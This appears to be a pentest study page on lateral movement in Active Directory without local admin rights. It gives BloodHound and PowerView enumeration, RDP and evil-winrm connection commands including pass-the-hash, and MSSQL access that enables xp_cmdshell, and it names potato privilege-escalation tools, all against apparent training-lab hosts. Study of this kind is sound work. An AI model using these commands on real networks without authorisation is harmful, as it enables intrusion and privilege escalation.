Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Privileged Access

Lateral movement techniques in AD environments when you don’t (yet) have local admin rights. Covers enumerating and exploiting Remote Desktop (RDP), WinRM/PSRemoting, and MSSQL sysadmin access.

Overview

After gaining a foothold, if you lack local admin rights for Pass-the-Hash, these remote access methods provide alternative lateral movement paths:

MethodProtocolPortUse Case
RDPRemote Desktop Protocol3389GUI access to a target host
WinRM / PSRemotingWindows Remote Management5985 (HTTP) / 5986 (HTTPS)PowerShell remote command execution
MSSQLTDS (SQL Server)1433OS command execution via xp_cmdshell if sysadmin

Enumeration

BloodHound Edges

EdgeMeaning
CanRDPUser can RDP to the host
CanPSRemoteUser can use WinRM/PSRemoting on the host
SQLAdminUser has sysadmin rights on a SQL Server instance

First thing to check after importing BloodHound data: Does the Domain Users group have local admin rights or execution rights (RDP, WinRM) over any hosts?

BloodHound Pre-built Queries

  • “Find Workstations where Domain Users can RDP”
  • “Find Servers where Domain Users can RDP”

BloodHound Custom Cypher Queries

-- Find users with WinRM access
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

-- Find users with SQL Admin access
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

PowerView Enumeration

# Enumerate Remote Desktop Users group
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

# Enumerate Remote Management Users group (WinRM)
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

The Remote Management Users group exists since Windows 8/Server 2012 to grant WinRM access without local admin rights.

Remote Desktop (RDP)

Even without local admin, RDP access lets you:

  • Launch further attacks from a new network position
  • Escalate privileges locally and harvest credentials
  • Pillage the host for sensitive data

Connecting

# From Linux
xfreerdp /v:TARGET_IP /u:DOMAIN\\user /p:'password' /cert-ignore

# Or with Remmina (GUI)
remmina

# From Windows
mstsc.exe /v:TARGET_IP

All Domain Users having RDP access is common on RDS/jump hosts — always check these for credentials and privilege escalation vectors.

WinRM / PSRemoting

From Windows (Enter-PSSession)

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\forend", $password)
Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred

From Linux (evil-winrm)

# Install
gem install evil-winrm

# Connect with password
evil-winrm -i TARGET_IP -u user -p 'password'

# Connect with NTLM hash
evil-winrm -i TARGET_IP -u user -H NTLM_HASH

Key evil-winrm flags:

FlagPurpose
-iTarget IP or hostname
-uUsername
-pPassword
-HNTLM hash (pass-the-hash)
-sPath to PowerShell scripts to upload
-ePath to C# executables to upload
-SEnable SSL (port 5986)

SQL Server Admin

MSSQL sysadmin access is nearly guaranteed SYSTEM-level access on the host — the SQL Server service account almost always has SeImpersonatePrivilege.

Common Ways to Obtain SQL Credentials

  • Kerberoasting (SPN accounts running MSSQL)
  • LLMNR/NBT-NS poisoning
  • Password spraying
  • Snaffler (finding web.config or connection strings in file shares)

From Windows (PowerUpSQL)

Import-Module .\PowerUpSQL.ps1

# Enumerate SQL instances in the domain
Get-SQLInstanceDomain

# Run a query against a remote SQL server
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

From Linux (mssqlclient.py)

# Connect with Windows authentication
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

# Once connected:
SQL> help
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami /priv

Privilege Escalation via SeImpersonatePrivilege

When the SQL service account has SeImpersonatePrivilege (it almost always does), escalate to SYSTEM using:

  • JuicyPotato
  • PrintSpoofer
  • RoguePotato
xp_cmdshell whoami /priv

If SeImpersonatePrivilege is Enabled, the host is exploitable.

Key Takeaways

  • Always check remote access rights (RDP, WinRM, SQLAdmin) after gaining each new account — even non-admin access can lead to further compromise
  • Enumeration and attack is iterative: repeat enumeration after every new account takeover
  • SQL credentials found anywhere (scripts, config files, connection strings) should be tested against all MSSQL servers in the environment
  • Non-admin RDP/WinRM access may still yield sensitive data or local privilege escalation paths